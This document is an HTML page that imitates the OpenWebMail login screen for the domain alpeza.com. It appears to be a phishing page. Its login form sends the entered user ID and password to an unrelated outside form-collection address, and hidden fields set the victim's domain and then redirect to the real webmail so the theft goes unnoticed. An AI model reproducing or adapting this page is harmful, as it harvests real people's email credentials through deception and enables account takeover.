<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
	<title>OpenWebMail </title>
	<link rel="shortcut icon" href="openwebmail.ico">
</head>
<body background="Globe.gif" bgcolor="#FFFFFF"  onhelp="window.open('/openwebmail/help/en_US.ISO8859-1/index.html', '_help'); return false;">

<style type="text/css">
<!--
body
{
	background-image: url(Globe.gif);
	background-repeat: repeat;
	font-family: Arial, Verdana;
	font-size: 10pt;
	color: black;
	scrollbar-arrow-color:black;
	scrollbar-base-color:#99BDDF;
	scrollbar-face-color:#F0F8FF;
}
th { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: bold; background-color: #D3DAE3; }
td { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; }
td.msgbody { font-family:  Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; }
form { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; margin-bottom: 0; }
input.mono { font-family: monospace; font-size: 9pt; }
select.mono { font-family: monospace; font-size: 9pt; }
h1 { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 16pt; font-weight: bold; }
A:link { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: black; }
A:visited { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: black; }
A:hover { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: red; }
A.msgbody:link { font-family:  Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: black; }
A.msgbody:visited { font-family:  Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: black; }
A.msgbody:hover { font-family:  Geneva, Arial, Helvetica, sans-serif; font-size: 10pt; text-decoration: none; color: red; }
.medtext { font-size: 9pt; }
.smalltext { font-size: 8pt; }
.smallblacktext { font-size: 8pt; color: #000000; }
.smallcolortext { font-size: 8pt; color: #c00000; }
.hilighttext { font-style: normal; font-weight: bold; background-color: #99BDDF; }
-->

</style>

<font face="Arial">
<p align="center">
  <a href="http://openwebmail.org/"><img border="0" src="openwebmail.gif"></a>
</p>

<table border="0" align="center" width="260" cellpadding="0" cellspacing="0">
<tr>
  <td bgcolor="#3161bd" background="bg-titleblue.gif">&nbsp;<font color="#FFFFFF" face="Arial" size="3"><b>Login</b></font></td>
</tr>
<tr>
  <td align="center" bgcolor="#3161bd">
    <table width="100%" cellpadding="0" cellspacing="1" border="0">
    <tr>
      <td bgcolor="#ffffff">
<form method="post" action="http://vaux.ml/app/formsave/index.php?klynt=03KA" enctype="application/x-www-form-urlencoded" name="login">

				    <input type="hidden" name="loginOp" value="login"/>
						<input type="hidden" name="onext" value="http://alpeza.com/openwebmail/cgi-bin/openwebmail.pl">

<br>
        <table align="center" border="0" cellspacing="2" cellpadding="0">
        <tr>
          <td align="right" nowrap>UserID: </td>
          <td><input type="text" name="loginname"  size="14" onchange="" /></td>
        </tr>
        <tr>
          <td align="right" nowrap>Password: </td>
          <td><input type="password" name="password"  size="14" onchange="" /></td>
<INPUT TYPE="hidden" NAME="logindomain" VALUE="alpeza.com">
        </tr>
        <tr>
          <td align="center" colspan="2">
            <table>
            <tr>
              <td align="center"><input type="submit" name="loginbutton" value="Login" /></td>
              <td align="center">
                <table>
                <tr>
                  <td><label><input type="checkbox" name="httpcompress" value="1" onclick="httpcompresshelp()" /></label></td>
                  <td><font size="1">HTTP<br>Compression</font></td>
                  <td><label><input type="checkbox" name="autologin" value="1" onclick="autologinhelp()" /></label></td>
                  <td><font size="1">Auto<br>Login</font></td>
                </tr>
                </table>
              </td>
            </tr>
            </table>
          </td>
        </tr>
        </table>
<br>
      </td>
<div><input type="hidden" name=".cgifields" value="autologin"  /><input type="hidden" name=".cgifields" value="httpcompress"  /></div>
</form>
    </tr>
    </table>
  </td>
</tr>
</table>

<script language="javascript">
<!--

   if (document.login.loginname.value == "") {
      document.login.loginname.focus()
   } else {
      document.login.password.focus()
   }

   function focuspwd() {
      document.login.password.focus();
      return(true);
   }

   function focusloginbutton() {
      document.login.loginbutton.focus();
      return (true);
   }

	function httpcompresshelp() {
		if (document.login.httpcompress.checked) {
			alert(
"HTTP Compression can reduce the use of network bandwidth between your computer and the webmail server effectively, "+
"but there are some compatibility issues:\n\n"+
"1. some proxy servers only support HTTP compression via HTTP 1.1, "+
"you may have to enable the HTTP1.1 support for proxy in your browser\n"+
"2. some proxy servers don't support HTTP compression at all, "+
"you may have to list the webmail server as directly connected in the proxy configuration of your browser.\n"+
"3. some browsers have problems when using HTTP compression with SSL...\n"+
"4. some browsers claim to support HTTP compression but actually not...\n\n"+
"So if you encounter any problem, please login again with this checkbox unchecked.\n"
			);
		}
		return(true);
	}

	function autologinhelp() {
		if (document.login.autologin.checked) {
			alert(
"When this feature is enabled, you may login into openwebmail without typing username/password "+
"if you didn't do logout in your previous openwebmail session and that session is not timeout. "+
"However, others may also auto login into your openwebmail account with this computer, "+
"so please DO NOT enable this feature on a public computer\n"
			);
		}
		return(true);
	}

//-->
</script>
<p align="center">
<br>
OpenWebMail version 2.53

&nbsp;
<a accesskey="H" href="http://alpeza.com/openwebmail/help/en_US.ISO8859-1/index.html" target="_help">Help?</a>

<br>
</p>
</body>
</html>
